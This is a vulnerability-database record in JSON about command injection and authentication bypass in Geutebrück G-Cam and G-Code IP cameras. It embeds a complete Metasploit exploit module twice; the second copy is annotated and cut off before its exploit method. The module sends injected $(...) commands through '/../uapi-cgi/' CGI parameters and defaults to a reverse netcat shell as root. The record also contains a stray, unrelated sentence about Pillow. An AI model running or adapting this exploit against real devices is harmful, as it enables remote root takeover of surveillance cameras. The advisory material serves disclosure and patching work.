        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The following multiple vulnerabilities exist in G-Cam E2 and G-Code, provided by GEUTEBRUCK. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549. The expected impact depends on each vulnerability, but may be as follows. * Confidential information is stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code is executed through command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * A buffer overflow of the counter parameter is triggered by a remote third party and arbitrary code is executed - CVE-2021-33545 \u2025 * A buffer overflow of the name parameter is triggered by a remote third party and arbitrary code is executed - CVE-2021-33546 \u2025 * A buffer overflow of the profile parameter is triggered by a remote third party and arbitrary code is executed - CVE-2021-33547 \u2025 * A buffer overflow of the action parameter is triggered by a remote third party and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. 
##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. 
\n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, \u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n               
 \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                
\u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n   
 end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33552"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33552",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2021090031",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33552",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33552"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "id": "VAR-202109-0848",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T21:38:18.392000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK\u2019s web portal (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Repair measures for the command injection vulnerability in multiple Geutebr\u00fcck camera devices",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158065"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.6,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2021090031"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33552"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33552"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-13T18:15:23.343000",
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2022-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2023-11-07T03:35:52.190000",
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in G-Cam E2 and G-Code made by GEUTEBRUCK",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0597

    Vulnerability from variot - Updated: 2025-01-30 21:21

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The G-Cam E2 and G-Code products provided by GEUTEBRUCK contain the following vulnerabilities. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on each vulnerability, but may be as follows. * A remote third party steals confidential information because of improper default user authentication settings - CVE-2021-33543 * A remote third party executes arbitrary code through command injection - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 * A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545 * A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546 * A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547 * A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549. Pillow is a Python-based image processing library [this sentence appears to belong to an unrelated record]. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    # Metasploit module quoted in this advisory record. It covers the command
    # injection CVEs listed under 'References' for Geutebruck G-Cam / G-Code
    # devices. The listing on this page had its line breaks collapsed; the
    # statements below are the same tokens with the layout restored.
    #
    # Reading guide for defenders:
    #   * `firmware` / `check` only fetch /brand.xml and compare the reported
    #     version; they send no injection request.
    #   * `exploit` sends a single request to one CGI under /uapi-cgi/ with the
    #     command placed in one request parameter (see 'Targets').
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      # NOTE(review): AutoCheck is prepended; presumably the framework then runs
      # `check` before `exploit` -- confirm against the framework documentation.
      prepend Msf::Exploit::Remote::AutoCheck

      # Registers the module metadata: name, description, authors, references,
      # the per-CVE targets and the default payload.
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Geutebruck Multiple Remote Command Execution',
            # The description states the affected firmware: <= 1.12.0.27, plus
            # 1.12.13.2 and 1.12.14.5. `check` below tests exactly these values.
            'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },

            'Author' => [
              'Titouan Lazard', # Of RandoriSec - Discovery
              'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
              'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
            ],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2021-33543'],
              ['CVE', '2021-33544'],
              ['CVE', '2021-33548'],
              ['CVE', '2021-33550'],
              ['CVE', '2021-33551'],
              ['CVE', '2021-33552'],
              ['CVE', '2021-33553'],
              ['CVE', '2021-33554'],
              [ 'URL', 'http://geutebruck.com' ],
              [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
              [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
            ],
            'DisclosureDate' => '2021-07-08',
            'Privileged' => true,
            'Platform' => ['unix', 'linux'],
            'Arch' => [ARCH_CMD],
            # One target per CVE. Each entry names a CGI under /uapi-cgi/, the
            # HTTP method (GET for all seven) and the request parameters.
            # PLACEHOLDER_CMD marks the value `exploit` fills in; six targets
            # wrap it in $( ), while testcmd.cgi takes it as the whole 'command'
            # value.
            #
            # For detection: all seven URIs share the literal '/../uapi-cgi/'
            # prefix, and the parameter names below are the ones that carry the
            # command. NOTE(review): how the path and parameter values appear in
            # device or proxy logs depends on client/server encoding -- confirm
            # before writing signatures.
            # NOTE(review): the Description mentions an HTTP basic authentication
            # bypass; presumably the leading '/../' is how it is reached, but
            # this page does not say so explicitly.
            'Targets' => [
              [
                'CVE-2021-33544 - certmngr.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => {
                    'action' => 'createselfcert',
                    'local' => Rex::Text.rand_text_alphanumeric(10..16),
                    'country' => Rex::Text.rand_text_alphanumeric(2),
                    'state' => '$(PLACEHOLDER_CMD)',
                    'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                    'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                    'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                    'days' => Rex::Text.rand_text_numeric(2..4),
                    'type' => Rex::Text.rand_text_numeric(2..4)
                  },
                  'uri' => '/../uapi-cgi/certmngr.cgi'
                }
              ],
              [
                'CVE-2021-33548 - factory.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
                  'uri' => '/../uapi-cgi/factory.cgi'
                }
              ],
              [
                'CVE-2021-33550 - language.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
                  'uri' => '/../uapi-cgi/language.cgi'
                }
              ],
              [
                'CVE-2021-33551 - oem.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => {
                    'action' => 'set',
                    'enable' => 'yes',
                    'environment.lang' => '$(PLACEHOLDER_CMD)'
                  },
                  'uri' => '/../uapi-cgi/oem.cgi'
                }
              ],
              [
                'CVE-2021-33552 - simple_reclistjs.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => {
                    'action' => 'get',
                    'timekey' => Rex::Text.rand_text_numeric(2..4),
                    'date' => '$(PLACEHOLDER_CMD)'
                  },
                  'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
                }
              ],
              [
                'CVE-2021-33553 - testcmd.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
                  'uri' => '/../uapi-cgi/testcmd.cgi'
                }
              ],
              [
                'CVE-2021-33554 - tmpapp.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
                  'uri' => '/../uapi-cgi/tmpapp.cgi'
                }
              ]
            ],
            'DefaultTarget' => 0,
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
            },
            # The module declares that it leaves artifacts on disk; which files
            # those are is not shown in this listing.
            'Notes' => {
              'Stability' => ['CRASH_SAFE'],
              'Reliability' => ['REPEATABLE_SESSION'],
              'SideEffects' => ['ARTIFACTS_ON_DISK']
            }
          )
        )
      end

      # Reads the firmware version the device reports in /brand.xml.
      #
      # Returns the first substring of the <firmware> element that looks like
      # d.d{1,3}.d{1,3}.d{1,3}, or false (after printing an error) when the
      # request gets no response, the body is empty, the element is missing, or
      # the element holds no version-like string.
      #
      # NOTE(review): the request below sets only the method and the URI;
      # whether /brand.xml requires authentication on the device is not shown
      # here.
      def firmware
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => '/brand.xml'
        )
        unless res
          print_error('Connection failed!')
          return false
        end

        unless res&.body && !res.body.empty?
          print_error('Empty body in the response!')
          return false
        end

        res_xml = res.get_xml_document
        if res_xml.at('//firmware').nil?
          print_error('Target did not respond with a XML document containing the "firmware" element!')
          return false
        end
        raw_text = res_xml.at('//firmware').text
        # The pattern is not anchored, so it extracts the version from any
        # surrounding text in the element.
        if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
          raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
        else
          print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
          false
        end
      end

      # Version-only check: compares the firmware string from `firmware` with
      # the affected versions and sends nothing else to the device.
      #
      # Returns CheckCode::Unknown when no version could be read,
      # CheckCode::Appears for versions <= 1.12.0.27 or exactly 1.12.13.2 /
      # 1.12.14.5, and CheckCode::Safe for every other version. The same
      # comparison can be applied to an asset inventory to find devices that
      # still need the vendor's firmware update.
      def check
        version = firmware
        if version == false
          return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')
        end

        rex_version = Rex::Version.new(version)
        vprint_status("Found Geutebruck version #{rex_version}")
        if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
          return CheckCode::Appears
        end

        CheckCode::Safe
      end

